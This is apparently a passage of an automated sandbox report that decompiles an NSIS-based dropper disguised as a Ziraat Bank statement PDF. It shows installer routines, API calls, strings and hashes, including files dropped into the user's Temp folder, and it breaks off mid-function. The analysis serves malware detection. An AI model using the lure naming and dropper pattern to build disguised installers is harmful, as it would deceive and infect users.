							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                    0x004030db
                                                    0x004030de
                                                    0x004030e1
                                                    0x004030fb
                                                    0x00403100
                                                    0x00403113
                                                    0x00403118
                                                    0x0040311e
                                                    0x00000000
                                                    0x00403120
                                                    0x00403131
                                                    0x00403142
                                                    0x00403149
                                                    0x00403151
                                                    0x00403156
                                                    0x00403158
                                                    0x00403243
                                                    0x00403245
                                                    0x00403251
                                                    0x00000000
                                                    0x00000000
                                                    0x0040325a
                                                    0x00403286
                                                    0x0040328b
                                                    0x00403296
                                                    0x00403298
                                                    0x004032a9
                                                    0x004032c4
                                                    0x004032cd
                                                    0x004032d2
                                                    0x004032f1
                                                    0x00403301
                                                    0x00403313
                                                    0x00403318
                                                    0x00403320
                                                    0x0040332d
                                                    0x00403335
                                                    0x0040333a
                                                    0x0040333c
                                                    0x0040333c
                                                    0x00403344
                                                    0x00403344
                                                    0x00403347
                                                    0x00403348
                                                    0x00403348
                                                    0x0040334b
                                                    0x0040334d
                                                    0x0040334d
                                                    0x00403357
                                                    0x00403363
                                                    0x00000000
                                                    0x00403368
                                                    0x00000000
                                                    0x00403320
                                                    0x00000000
                                                    0x004032d4
                                                    0x00403262
                                                    0x00403274
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040315e
                                                    0x00403163
                                                    0x00403168
                                                    0x0040316c
                                                    0x00403173
                                                    0x0040317a
                                                    0x0040317c
                                                    0x0040317c
                                                    0x00403187
                                                    0x004032e0
                                                    0x00403322
                                                    0x00000000
                                                    0x00403322
                                                    0x00403194
                                                    0x00403214
                                                    0x00403218
                                                    0x0040321d
                                                    0x00000000
                                                    0x00403214
                                                    0x0040319d
                                                    0x004031a2
                                                    0x004031aa
                                                    0x004031d0
                                                    0x004031df
                                                    0x004031e5
                                                    0x004031ea
                                                    0x004031f0
                                                    0x00000000
                                                    0x00000000
                                                    0x004031fa
                                                    0x00403202
                                                    0x00403205
                                                    0x0040320a
                                                    0x0040320c
                                                    0x0040320c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004031fa
                                                    0x0040321e
                                                    0x00403224
                                                    0x00403230
                                                    0x00403230
                                                    0x00403233
                                                    0x00403239
                                                    0x00403239
                                                    0x00403241
                                                    0x00000000
                                                    0x00403241

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 004030E4
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,00000400), ref: 00403100
                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00403149
                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                    • API String ID: 2803837635-823795199
                                                    • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                    • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                    • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                    • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                    C-Code - Quality: 77%
                                                    			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\alfons\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\alfons\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                    0x0040176f
                                                    0x00401776
                                                    0x00401782
                                                    0x00401785
                                                    0x0040178a
                                                    0x0040178d
                                                    0x00401794
                                                    0x004017b0
                                                    0x00401796
                                                    0x00401797
                                                    0x00401797
                                                    0x004017b6
                                                    0x004017bb
                                                    0x004017bb
                                                    0x004017bf
                                                    0x004017c2
                                                    0x004017c7
                                                    0x004017c9
                                                    0x004017cb
                                                    0x004017d0
                                                    0x004017d0
                                                    0x004017db
                                                    0x004017db
                                                    0x004017ec
                                                    0x004017ee
                                                    0x004017ee
                                                    0x004017ef
                                                    0x004017ef
                                                    0x004017f2
                                                    0x004017f5
                                                    0x004017f8
                                                    0x004017f8
                                                    0x004017ff
                                                    0x0040180e
                                                    0x00401813
                                                    0x00401816
                                                    0x00401819
                                                    0x00000000
                                                    0x00000000
                                                    0x0040181b
                                                    0x0040181e
                                                    0x00401874
                                                    0x00401879
                                                    0x004015b6
                                                    0x0040292e
                                                    0x0040292e
                                                    0x00402c2a
                                                    0x00402c2d
                                                    0x00402c2d
                                                    0x00000000
                                                    0x00401820
                                                    0x00401826
                                                    0x0040182d
                                                    0x0040183a
                                                    0x00401845
                                                    0x0040185b
                                                    0x0040185b
                                                    0x0040185e
                                                    0x00000000
                                                    0x00401864
                                                    0x00401864
                                                    0x00401865
                                                    0x00401882
                                                    0x00402c33
                                                    0x00402c33
                                                    0x00402c33
                                                    0x00401867
                                                    0x00401867
                                                    0x00401868
                                                    0x00401493
                                                    0x0040239d
                                                    0x0040239d
                                                    0x0040239d
                                                    0x00401865
                                                    0x0040185e
                                                    0x00402c35
                                                    0x00402c39
                                                    0x00402c39
                                                    0x00401892
                                                    0x00401897
                                                    0x004018a5
                                                    0x004018aa
                                                    0x004018b0
                                                    0x004018b4
                                                    0x004018b6
                                                    0x004018be
                                                    0x004018ca
                                                    0x004018b8
                                                    0x004018b8
                                                    0x004018bc
                                                    0x00000000
                                                    0x00000000
                                                    0x004018bc
                                                    0x004018d3
                                                    0x004018d9
                                                    0x004018db
                                                    0x00000000
                                                    0x004018e1
                                                    0x004018e1
                                                    0x004018e4
                                                    0x004018fc
                                                    0x004018e6
                                                    0x004018e9
                                                    0x004018f2
                                                    0x004018f2
                                                    0x00401901
                                                    0x00401906
                                                    0x00402398
                                                    0x00000000
                                                    0x00402398
                                                    0x00000000

                                                    APIs
                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                    • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000000,00000000,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                    • String ID: "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                    • API String ID: 1941528284-3088590382
                                                    • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                    • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                    • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                    • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                    C-Code - Quality: 100%
                                                    			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                    0x004069dc
                                                    0x004069e5
                                                    0x004069e7
                                                    0x004069e7
                                                    0x004069eb
                                                    0x004069fe
                                                    0x004069f8
                                                    0x004069f8
                                                    0x004069f8
                                                    0x00406a17
                                                    0x00406a2b
                                                    0x00406a32

                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                    • wsprintfW.USER32 ref: 00406A17
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                    • String ID: %s%S.dll$UXTHEME$\
                                                    • API String ID: 2200240437-1946221925
                                                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                    • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                    • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                    C-Code - Quality: 100%
                                                    			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                    0x00405ba4
                                                    0x00405ba8
                                                    0x00405bab
                                                    0x00405bb1
                                                    0x00405bb5
                                                    0x00405bb9
                                                    0x00405bc1
                                                    0x00405bc8
                                                    0x00405bce
                                                    0x00405bd5
                                                    0x00405bdc
                                                    0x00405be4
                                                    0x00405be6
                                                    0x00000000
                                                    0x00405be6
                                                    0x00405bf0
                                                    0x00405bf7
                                                    0x00405c0d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405c0f
                                                    0x00405c13

                                                    APIs
                                                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                    • GetLastError.KERNEL32 ref: 00405BF0
                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                    • GetLastError.KERNEL32 ref: 00405C0F
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 3449924974-823278215
                                                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                    • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                    • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 538 406bb0-406bd3 539 406bd5-406bd8 538->539 540 406bdd-406be0 538->540 541 4075fd-407601 539->541 542 406be3-406bec 540->542 543 406bf2 542->543 544 4075fa 542->544 545 406bf9-406bfd 543->545 546 406d39-4073e0 543->546 547 406c9e-406ca2 543->547 548 406d0e-406d12 543->548 544->541 549 406c03-406c10 545->549 550 4075e5-4075f8 545->550 556 4073e2-4073f8 546->556 557 4073fa-407410 546->557 554 406ca8-406cc1 547->554 555 40754e-407558 547->555 551 406d18-406d2c 548->551 552 40755d-407567 548->552 549->544 558 406c16-406c5c 549->558 550->541 559 406d2f-406d37 551->559 552->550 560 406cc4-406cc8 554->560 555->550 561 407413-40741a 556->561 557->561 562 406c84-406c86 558->562 563 406c5e-406c62 558->563 559->546 559->548 560->547 564 406cca-406cd0 560->564 567 407441-40744d 561->567 568 40741c-407420 561->568 571 406c94-406c9c 562->571 572 406c88-406c92 562->572 569 406c64-406c67 GlobalFree 563->569 570 406c6d-406c7b GlobalAlloc 563->570 565 406cd2-406cd9 564->565 566 406cfa-406d0c 564->566 573 406ce4-406cf4 GlobalAlloc 565->573 574 406cdb-406cde GlobalFree 565->574 566->559 567->542 575 407426-40743e 568->575 576 4075cf-4075d9 568->576 569->570 570->544 578 406c81 570->578 571->560 572->571 572->572 573->544 573->566 574->573 575->567 576->550 578->562
                                                    C-Code - Quality: 98%
                                                    			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
